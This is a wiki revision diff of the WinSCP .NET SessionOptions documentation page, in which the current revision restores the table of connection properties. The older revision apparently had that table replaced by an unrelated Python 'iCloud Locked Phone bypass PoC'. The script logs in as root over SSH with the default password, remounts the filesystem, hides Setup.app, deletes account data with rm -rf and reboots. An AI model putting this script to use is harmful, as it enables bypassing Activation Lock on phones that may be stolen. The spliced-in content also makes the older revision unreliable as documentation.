Differences
This shows you the differences between the selected revisions of the page.
library_sessionoptions 2021-09-01 | library_sessionoptions 2023-09-28 (current) | ||
Line 21: | Line 21: | ||
| SessionOptions() | Default constructor. | | | SessionOptions() | Default constructor. | | ||
- | """ | + | ===== [[properties]] Properties ===== |
- | iCloud Locked Phone bypass PoC | + | ^ Name ^ Description ^ |
- | you need to get the SSH server on your iDevice running first | + | | FtpMode ==FtpMode== | [[ftp_modes|FTP mode]]. Possible values are ''FtpMode.Passive'' (default) and ''FtpMode.Active''. | |
- | """ | + | | FtpSecure ==FtpSecure== | [[ftps#methods|FTPS mode]]. Possible values are ''FtpSecure.None'' (default), ''FtpSecure.Implicit'' and ''FtpSecure.Explicit''. | |
- | import subprocess | + | | <del>bool ==GiveUpSecurityAndAcceptAnySshHostKey==</del> | Give up security and accept any [[ssh_verifying_the_host_key|SSH host key]]. To be used in exceptional situations only, when security is not required. When set, log files will include warning about insecure connection. To maintain security, use [[#sshhostkeyfingerprint|''SshHostKeyFingerprint'']]. //Obsoleted, use [[#sshhostkeypolicy|''SshHostKeyPolicy.GiveUpSecurityAndAcceptAny'']] instead.// | |
- | import paramiko | + | | bool ==GiveUpSecurityAndAcceptAnyTlsHostCertificate== | Give up security and accept any FTPS/WebDAVS server [[tls#certificate|TLS/SSL certificate]]. To be used in exceptional situations only, when security is not required. When set, log files will include warning about insecure connection. To maintain security, use [[#tlshostcertificatefingerprint|''TlsHostCertificateFingerprint'']]. | |
- | + | | string ==HostName== | Name or IP of the host to connect to. Mandatory property. In a form of ''example.com'' or ''192.0.2.0''. | | |
- | RPORT = 44 | + | | string ==Name== | Returns a generated name of a session, based on available information -- typically ''UserName@HostName''. Read-only. | |
- | LPORT = 2222 | + | | string ==NewPassword== | When set, tries to [[task_change_password|change password]] to the new one. | |
- | password = "alpine" | + | | string ==Password== | Password for authentication. | |
- | + | | int ==PortNumber== | Port number to connect to. Keep default ''0'' to use the default port for the protocol. | | |
- | iproxy = subprocess.Popen(["iproxy", str(LPORT), str(RPORT)], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT) | + | | string ==PrivateKeyPassphrase== | Passphrase for encrypted private keys and client certificates. | |
- | ssh = paramiko.SSHClient() | + | | Protocol ==Protocol== | Protocol to use for the session. Possible values are ''Protocol.Sftp'' (default), ''Protocol.Scp'', ''Protocol.Ftp'', ''Protocol.Webdav'' and ''Protocol.%%S3%%''. \\ When set to ''%%S3%%'', and [[#hostname|''HostName'']] is not set yet, it is set to ''s3.amazonaws.com'' and [[#secure|''Secure'']] is enabled. | |
- | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | + | | string ==RootPath== | WebDAV root path or S3 bucket path. Set, when the HTTP server root or S3 bucket list is not accessible. | |
- | print("Initiating SSH connection") | + | | bool ==Secure== | Use encrypted connection (TLS/SSL) with WebDAV or S3. Default is ''false''. | |
- | while True: | + | | [[dotnet>system.security.securestring|SecureString]] ==SecureNewPassword== | When set, tries to [[task_change_password|change password]] to the new one. Use instead of [[#newpassword|''NewPassword'']] to reduce a number of unencrypted copies of the password in memory. | |
- | ···try: | + | | [[dotnet>system.security.securestring|SecureString]] ==SecurePassword== | Encrypted password for authentication. Use instead of [[#password|''Password'']] to reduce a number of unencrypted copies of the password in memory. | |
- | ·······ssh.connect('localhost', username='root', password=password, port=LPORT) | + | | [[dotnet>system.security.securestring|SecurePrivateKeyPassphrase]] ==SecurePrivateKeyPassphrase== | Encrypted passphrase for encrypted private keys and client certificates. Use instead of [[#privatekeypassphrase|''PrivateKeyPassphrase'']] to reduce a number of unencrypted copies of the passphrase in memory. | |
- | ·······break | + | | string ==SshHostKeyFingerprint== | Fingerprint of SSH server [[ssh_verifying_the_host_key|host key]] (or several alternative fingerprints separated by semicolon). It makes WinSCP automatically [[scripting#hostkey|accept host key]] with the fingerprint. Use SHA-256 fingerprint of the host key. Mandatory for SFTP/SCP protocol.((You can leave the property ''null'', if you set [[#sshhostkeypolicy|''SshHostKeyPolicy'']] to a different value than ''SshHostKeyPolicy.Check''.)) //Learn how to [[faq_hostkey|obtain host key fingerprint]]//.··| |
- | ···except: | + | | SshHostKeyPolicy ==SshHostKeyPolicy== | SSH host key policy. Use the default ''SshHostKeyPolicy.Check'' to [[ssh_verifying_the_host_key|verify the host key]] against [[#sshhostkeyfingerprint|''SshHostKeyFingerprint'']]. Use ''SshHostKeyPolicy.GiveUpSecurityAndAcceptAny'' to give up a security and accept any SSH host key. To be used in exceptional situations only, when security is not required. When set, log files will include warning about insecure connection. Use ''SshHostKeyPolicy.AcceptNew'' to automatically accept host key of new hosts. The known keys are cached in registry. | |
- | ·······print("Failed, retrying") | + | | string ==SshPrivateKey== | SSH [[public_key#private|Private key file]] contents. | |
- | ·······continue | + | | string ==SshPrivateKeyPath== | Full path to SSH [[public_key#private|private key file]]. | |
- | print("Connection established") | + | | string ==TlsClientCertificatePath== | Full path to [[tls#client_certificate|TLS/SSL client certificate]]. | |
- | print("Mounting filesystem as read/write") | + | | string ==TlsHostCertificateFingerprint== | Fingerprint of FTPS/WebDAVS server [[tls#certificate|TLS/SSL certificate]] to be automatically accepted (useful for certificates signed by an untrusted authority). Use SHA-256 fingerprint of the certificate. | |
- | ssh.exec_command("mount -o rw,union,update /") | + | | TimeSpan ==Timeout== | Server response timeout. Defaults to 15 seconds. | |
- | print("Cleaning mount_rw file") | + | | int ==TimeoutInMilliseconds== | Alternative to [[#timeout|''Timeout'']]. Particularly useful for COM hosts, that cannot use ''TimeSpan'', such as Visual Basic. | |
- | ssh.exec_command('echo "" > /.mount_rw') | + | | string ==UserName== | Username for authentication. Mandatory property. | |
- | print("Hiding Setup.app") | + | | <del>bool ==WebdavSecure==</del> | Obsolete. Use [[#secure|''Secure'']]. | |
- | ssh.exec_command("mv /Application/Setup.app /Application/Setup.app.backup") | + | |
- | print("Clearing UI cache") | + | |
- | ssh.exec_command("uicache --all") | + | |
- | print("Clearing iCloud user") | + | |
- | ssh.exec_command("rm -rf /var/mobile/Library/Accounts/*") | + | |
- | print("Respringing device") | + | |
- | ssh.exec_command("killall backboardd") | + | |
- | print("Finishing exploit script") | + | |
- | print("Restarting your device") | + | |
- | ssh.exec_command("reboot") | + | |
- | iproxy.terminate() | + | |
- | iproxy.kill() | + | |
===== Methods ===== | ===== Methods ===== |